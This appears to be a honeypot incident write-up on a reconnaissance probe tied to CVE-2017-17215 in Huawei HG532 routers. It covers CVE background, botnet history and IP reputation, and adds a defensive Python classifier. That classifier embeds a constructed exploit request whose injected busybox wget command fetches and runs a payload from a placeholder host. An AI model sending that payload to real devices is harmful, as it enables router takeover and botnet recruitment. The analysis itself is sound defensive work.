Attack Summary
On January 28, 2026 at 21:01:11 UTC, IP address 60[.]19[.]220[.]0 hit my ICS honeypot with a request associated with CVE-2017-17215, a remote code execution vulnerability in Huawei HG532 routers. The request was an HTTP/1.0 login attempt against /boaform/admin/formLogin carrying default credentials (username=user&psd=user).
The IP has two recent reports on AbuseIPDB, consistent with active malicious scanning.
CVE-2017-17215
CVE-2017-17215 is a remote code execution flaw in Huawei HG532 home gateways disclosed in November 2017. It sits in the router's UPnP implementation: the TR-064 protocol, intended for configuration from the local network, was reachable from the WAN on TCP port 37215 [1].
Attackers inject shell commands through the NewStatusURL parameter (the neighbouring NewDownloadURL parameter is injectable the same way) of SOAP/XML requests sent to port 37215 [2]; the device passes the value to a shell without sanitising it. The flaw allows unauthenticated remote code execution, which makes any exposed device a trivial target.
Attack Pattern
The observed request was a reconnaissance probe rather than the exploit itself: a login attempt with default credentials over HTTP/1.0 against the web interface, of the kind used to fingerprint candidate routers before the UPnP exploit is sent. Note that /boaform/admin/formLogin is the login form of the Boa embedded web server and the request never touched port 37215, so the CVE-2017-17215 attribution rests on the scanning pattern, not on an exploit payload.
In a successful attack chain, the probe would be followed by a SOAP/XML request to the DeviceUpgrade_1 service on port 37215, and the injected command would then fetch and run a malware payload. This attempt was not successful: the honeypot does not emulate a Huawei router, so there was no vulnerable service to move on to.
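As an added example (not code from the original post), here is a small Python classifier that runs over raw HTTP requests and separates the three things described above: the Boa login probe seen by the honeypot, a request to the vulnerable UPnP service that carries no payload, and a real CVE-2017-17215 exploit attempt with a shell command substituted into NewStatusURL. The two sample requests are constructed; the SOAP body follows the structure of the public exploit (Upgrade action on /ctrlt/DeviceUpgrade_1), and all hosts and addresses are RFC 5737 documentation ranges.

```python
"""Classify honeypot HTTP requests against the CVE-2017-17215 attack chain.

Added example, not code from the original post. The two request texts are
constructed; the SOAP body mirrors the structure of the public exploit
(Upgrade action on /ctrlt/DeviceUpgrade_1 with a shell command substituted
into NewStatusURL). All addresses are RFC 5737 documentation ranges.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

UPNP_PORT = 37215
UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"
BOA_LOGIN_PATH = "/boaform/admin/formLogin"

# Parameters the vulnerable Upgrade action hands to the shell unsanitised.
URL_TAGS = re.compile(r"<(NewStatusURL|NewDownloadURL)>(.*?)</\1>", re.S)
# Command-substitution and command-chaining tokens that never belong in a URL.
INJECTION = re.compile(r"\$\(|`|;|&&|\|\|")


@dataclass
class Verdict:
    label: str                                    # see classify()
    injected: list = field(default_factory=list)  # shell fragments found in URL params


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw: str, dst_port: Optional[int] = None) -> Verdict:
    """Label one request: exploit, UPnP service probe, Boa login probe, or unrelated."""
    _method, path, headers, body = parse_request(raw)
    if dst_port is None:                      # fall back to the port in the Host header
        host = headers.get("host", "")
        dst_port = int(host.rsplit(":", 1)[1]) if ":" in host else 80
    if dst_port == UPNP_PORT and path == UPGRADE_PATH:
        injected = [val for _, val in URL_TAGS.findall(body) if INJECTION.search(val)]
        if injected:
            return Verdict("cve-2017-17215-exploit", injected)
        return Verdict("cve-2017-17215-service-probe")   # right service, no payload
    if path.startswith(BOA_LOGIN_PATH):
        # Boa web-server login form: a generic CPE fingerprint, not the UPnP vector.
        return Verdict("boa-login-probe")
    return Verdict("unrelated")


# Constructed: the request the honeypot actually saw (credentials as in the post).
LOGIN_PROBE = (
    "POST /boaform/admin/formLogin HTTP/1.0\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=user&psd=user"
)

# Constructed: the command a real second stage substitutes into NewStatusURL.
INJECTED_CMD = "$(/bin/busybox wget -g 198.51.100.7 -l /tmp/x -r /x; /bin/busybox chmod 777 /tmp/x; /tmp/x)"

# Constructed: second stage shaped like the public CVE-2017-17215 SOAP payload.
EXPLOIT_STAGE = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Host: 192.0.2.10:37215\r\n"
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<?xml version="1.0" ?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    f"<NewStatusURL>{INJECTED_CMD}</NewStatusURL>"
    "<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>"
)

if __name__ == "__main__":
    for name, raw, port in (("login probe", LOGIN_PROBE, 80), ("exploit stage", EXPLOIT_STAGE, 37215)):
        verdict = classify(raw, port)
        print(f"{name}: {verdict.label} {verdict.injected}")
```

The point of keeping "service probe" and "exploit" apart is triage: a bare request to DeviceUpgrade_1 tells you someone is enumerating the UPnP service, while a match on INJECTION inside the URL parameters gives you the download host and dropper path to block and hunt for.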
Historical Context
This exploit gained notoriety through the Satori botnet (also known as Okiru), a Mirai variant that began exploiting CVE-2017-17215 in December 2017 [3]. The exploit code was publicly leaked on Pastebin during Christmas 2017 and has been weaponized by multiple botnets since then, including Brickerbot [4].
The Cymulate Threat Research Group identified renewed exploitation activity in January 2025, with a new Mirai shell variant specifically targeting this vulnerability. The campaign uses wget to download malware payloads from command and control servers and employs the UPX executable packer to evade detection [5].
Countries historically most affected by CVE-2017-17215 exploitation include the United States, Germany, Italy, and Egypt [6].
IP Intel
The attacking IP 60[.]19[.]220[.]0 falls in 60[.]0[.]0[.]0/8, an APNIC (Asia-Pacific) allocation, which puts it most likely in Taiwan or China; a WHOIS or RDAP lookup of the specific /24 would name the actual assignee. Its threat intelligence profile is clean apart from two recent reports:
- VirusTotal: Clean (0 detections)
- CrowdSec: No reports
- AbuseIPDB: 2 recent reports
This suggests the IP is either a newly compromised device recently recruited into a botnet, or one conducting low-volume scanning that stays under the detection thresholds of most feeds. The Asia-Pacific region continues to be a significant source of IoT botnet activity.
Implications
Legacy vulnerability persistence: CVE-2017-17215 remains actively exploited more than eight years after its initial disclosure, demonstrating how legacy IoT vulnerabilities continue to provide value for botnet operators targeting unpatched devices.
Threat intelligence gaps: the IP was clean on VirusTotal and CrowdSec despite active scanning, a reminder that low-volume scanners sit below the thresholds of most commercial feeds. The two recent AbuseIPDB reports did line up with what the honeypot saw, which is exactly where crowdsourced abuse reporting earns its keep.